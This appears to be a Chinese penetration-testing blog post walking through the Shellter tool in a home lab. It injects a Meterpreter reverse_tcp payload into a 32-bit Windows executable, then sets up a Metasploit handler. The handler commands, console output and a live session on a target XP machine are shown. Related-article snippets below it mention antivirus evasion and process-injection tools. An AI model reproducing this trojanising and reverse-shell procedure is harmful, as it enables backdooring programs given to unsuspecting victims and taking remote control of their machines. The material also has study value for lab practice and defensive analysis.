Shellter实操——exe文件注入

最新推荐文章于 2023-10-16 12:40:23 发布
最新推荐文章于 2023-10-16 12:40:23 发布
阅读量1.7k 收藏 11
点赞数
分类专栏: 渗透测试笔记 Kali高级渗透测试 文章标签: shellter kali linux metasploit 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/119360725
版权

Shellter实操

shellter主要功能为入侵PE文件(exe),可以将shell代码注入任何32位的本地windows应用程序当中,它允许搭配metasploit框架使用

安装shellter

apt-get install shellter

安装完成后,提示符输入shellter打开
成功打开后会出现一个
在这里插入图片描述
这里提示可以选择自动(A)手动(M)以及帮助(H),我们选择A
在这里插入图片描述
这一步是提供pe目标文件,下面是我自己导入的一个exe文件
在这里插入图片描述
大概过个一分钟(或更短)就会提示成功
在这里插入图片描述
接下来提示是否选择隐身模式,选择是
在这里插入图片描述
是否选择列表内的载荷或自定义
在这里插入图片描述
我们选择tcp的,并输入ip和端口在这里插入图片描述
出现这个说明注入成功
在这里插入图片描述
打开metasploit框架

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.43
set lport 5555
exploit -j -z

可以将上述命令存一个xx.rc文件中
使用metasploit -r xx.rc运行


msf6 > resource geek.rc 
[*] Processing /root/geek.rc for ERB directives.
resource (/root/geek.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/root/geek.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/geek.rc)> set lhost 192.168.3.43
lhost => 192.168.3.43
resource (/root/geek.rc)> set lport 5555
lport => 5555
resource (/root/geek.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.3.43:5555 
msf6 exploit(multi/handler) >

在另一台靶机内打开刚才注入的exe程序
在这里插入图片描述
kali主机这里成功出现一个session

msf6 exploit(multi/handler) > [*] Sending stage (175174 bytes) to 192.168.3.29
[*] Meterpreter session 1 opened (192.168.3.43:5555 -> 192.168.3.29:3303) at 2021-08-03 22:45:15 +0800

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  WINXP-1\st21 @ WINXP-1  192.168.3.43:5555 -> 192.168.3.29:3303 (192.168.3.29)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:95:e3:ea
MTU          : 1500
IPv4 Address : 192.168.3.29
IPv4 Netmask : 255.255.255.0


Interface 65540
============
Name         : Bluetooth خ▒
Hardware MAC : 94:b8:6d:d2:53:f1
MTU          : 1500

meterpreter >
我重来不说话
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
关于利用shellter
我的天,bug!
08-01 4562
关键不在于怎么想,而在于怎么做。 今天给大家带来服务器提权之G6FTP提权(好久没写博客了,添点东西上去.....)。这里就不多废话,采用一款市面上的cms做演示站点(本人在这个cms上发现了严重的变量覆盖漏洞,影响站点很多,就不演示拿webshell了,)。 简介:Gene6FTP是一款FTP工具,使用的范围很广, 1、前提条件 你已经拿到了webshell
shellter使用及免杀测试
时乙的博客
10-14 3680
shellter是一个开源的老牌免杀工具,最初版在2014年发布,现在已经到Shellter Pro v4.0了。它利⽤动态Shellcode注⼊或者命令来现免杀的效果。 shellter安装 shellter在kali中是自带的,再接在命令行shellter就可以。 如果想在windows中安装的话就去官方下载源码包: https://www.shellterproject.com/download/ 下载后解压,直接在命令行就可以用,不需要安装。 shellter使用 以下所有的演示都是
exe版sqlmap注入工具
07-26
exe版sqlmap注入工具,无需python环境,直接使用,使用方法跟原版sqlmap一样
你不一定全部知道的16种进程注入方法和注入工具(C语言版)
最新发布
weixin_30852573的博客
10-16 191
shellcode注入.rar: https://url18.ctfile.com/f/7715018-958725849-037397?p=6511 (访问密码: 6511)p=6511 (访问密码: 6511)p=6511 (访问密码: 6511)挂起进程注入.rar: https://url18.ctfile.com/f/7715018-958725843-a7710c?apc注入.rar: https://url18.ctfile.com/f/7715018-958725861-c1e5ba?
kali linux捆绑工具shellter的安装及使用
热门推荐
wkend的博客
03-16 1万+
kali linux捆绑工具shellter的安装及使用 按图所示输入命令 2.输入shellter,出现下图所示表示安装成功 shellter的使用 1.从浏览器下载putty,并且剪切到home目录下 2.在这里提示有三种作模式 - A:自动 - M:管理者,高级模式 - H:帮助选项 在这里我们输入A,选择自动模式 3.输入pe t...
SetDll把Dll文件注入到.exe应用程序中
weixin_34183910的博客
04-30 602
setdll.exe 下载地址:http://download.csdn.net/detail/u013147600/8649009点击打开链接 1.将下载好的setdll.exe 和.exe应用程序以及.dll文件放在同一个文件夹下 如图: 在同一文件夹下新建一个批处理文件:Setdll.bat 内容如下: @echo off setdll /d:messageD...
ShellTer-开源
06-06
ShellTer 是一个基于 iptables 的防火墙。 它与其他产品的不同之处在于它具有内置的 SSH 蛮力保护。 它易于配置并具有交互式 CLI 安装程序。
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
它支持将恶意代码注入到32位的可执行文件中,以隐藏木马的行为。 2. **Kali Linux与Wine**:在Kali Linux中,由于默认不支持直接运行Windows应用程序,因此需要安装Wine和wine32来模拟Windows环境,以便运行像...
Kali Linux安全渗透教程第九章(内部资料)
05-27
Kali Linux 安全 渗透 教程 第九章(内部资料)
虚拟机安装Linux系统.txt
04-07
本文将深入探讨如何使用虚拟机软件VMware Workstation来安装Linux系统,基于给定文件的信息,我们将详细解析整个安装流程,包括设置、配置及启动Linux虚拟机的关键步骤。 ### 一、准备阶段:创建Linux虚拟机 #### ...
代码注入工具.exe
02-14
n早之前做的小工具,本来是自己用的,最近有人找我要就发了出来 这类工具原理都差不多,功能也基本相同,我这个可能还没其他的好 工具的基本功能就是汇编代码注入,我在注入的代码中加入了SEH和取返回值的代码 前段时间@KaQqi 问我这个注入工具怎么写短跳,我告诉他没法写,程序的逻辑没现这个(才不会说是我没思路呢) 于是我想了一个折中的方法,添加一个自定义命令emit,自己写短跳的机器码就可以了 注意:本注入工具的数字均为16进制 如果注入的程序带有SafeSEH,那么注入器的SEH不会被触发 本程序用vs2015编译的,在win10 x64和winxp虚拟机测试了没发现问题 如果发现bug之类的,请在下方回帖,有空了会看能否修复 剩下的想到什么在补充吧
投稿文章:Bypass ESET NOD32 HIPS - 原创文章发布(Original Article) - T00LS -
08-03
6. Shellter免杀技术:Shellter是一种动态代码注入工具,可以将Cobalt Strike的Payload(payload.bin)捆绑到一个干净的32位可执行文件(例如putty.exe)中,以避开安全软件的检测。 7. 免杀效果验证:文章中可能...
EXE进程注入EXE研究
gameWYD的专栏
10-15 4635
EXE比较复杂,主要是进程间的虚拟地址是重叠的,注入代码不能覆盖目标进程的代码,所以只能注入到与原本不同的虚拟地址上,这样所有直接寻址的指令都会出错,要避免使用直接寻址或者用代码修正使用直接寻址的指令。避免直接寻址的做法是:要注入的代码中,不要使用全局变量、静态变量、字符串常量
无DLL,直接将整个EXE注入其他进程
El Psy Congroo
08-02 8950
注入代码的方式比较 注入shellcode 优点: 1. 简单,只需要EXE的一部分。代码可以用C\C++或汇编写 缺点: 1. 要写位置无关代码,这意味着不能直接使用全局变量、其他编译单元的函数(包括CRT的memcpy)、API等。如果要使用则要由源进程分配空间、计算API在目标进程的地址,并传到目标进程的shellcode。或者shellcode自己计算LoadLibrary和Ge...
Heart.EXE注入函数完整过程及分析总结(图15个,涉及函数重定向,函数参数等问题,不是运行时注入,是在EXE文件注入函数)
贺昌锋的博客,, 西安,陕西,Chang Feng He
10-26 1666
Heart执行文件EXE函数注入完整过程(图15个,设计函数重定向,函数参数等问题) **微软红桃大战游戏heart.exe,我拷贝为D.EXE,运行后先弹出自己的一个对话框,然后再正常游戏。几乎花了我2周的时间,从头到尾。这只是后面一部分。涉及到DLL函数的重定位,函数参数的相对地址,PE文件的结构。声明一下,我是在WIN 7 + Intel 赛扬32位上破解注入成功的。 我信奉动手做,之说...
PE格式文件的代码注入
谢启东的专栏
05-05 8036
 PE格式文件的代码注入   本文演示了在不需要重新编译源代码的情况下,怎样向Windows PE(Portable Executable)格式的文件(包括EXE、DLL、OCX)中注入自己的代码。 程序如图:         前言       或许,你想了解一个病毒程序是怎样把自身注入到一个正常的PE文件中的,又或者是,你为了保护某种数据而加密自己的P
C# 嵌入exe资源
kongfl888的专栏
09-27 859
using System; using System.Collections.Generic; using System.Text; using System.Reflection; using System.IO; using System.Windows.Forms; namespace War3Screen { /// /// 嵌入资源中的文件的释放类--kon
kali免杀工具shellter
scholar_1的博客
08-06 4060
工具安装完成后再/usr/share/windows-resources/shellter 这个文件shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助。(Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助。...
在kali上下载shellter,压缩包里面并没有你说的./shellter 只有shellter.exe,这个无法在kali上执行,我想知道的是怎么在kali上运行shellter
05-12
你可以尝试使用Wine在Kali上运行shellter.exe。Wine是一个在Linux上运行Windows程序的兼容层,可以让你在Linux上运行许多Windows程序。以下是在Kali上安装Wine并运行shellter.exe的步骤: 1. 打开终端并输入以下命令安装Wine: ``` sudo apt-get update sudo apt-get install wine ``` 2. 下载Shellter的Windows版本(.exe文件)并将其保存在Kali系统上。 3. 在终端中导航到包含shellter.exe文件的目录。例如,如果你将文件保存在“/home/user/Downloads”目录中,则可以使用以下命令导航到该目录: ``` cd /home/user/Downloads ``` 4. 在终端中运行以下命令来启动shellter.exe: ``` wine shellter.exe ``` 现在,你应该能够在Kali上运行Shellter了。请注意,由于Wine是一个兼容层,因此可能会遇到一些不兼容问题。如果你遇到任何问题,请参考Wine的官方文档以了解如何解决这些问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值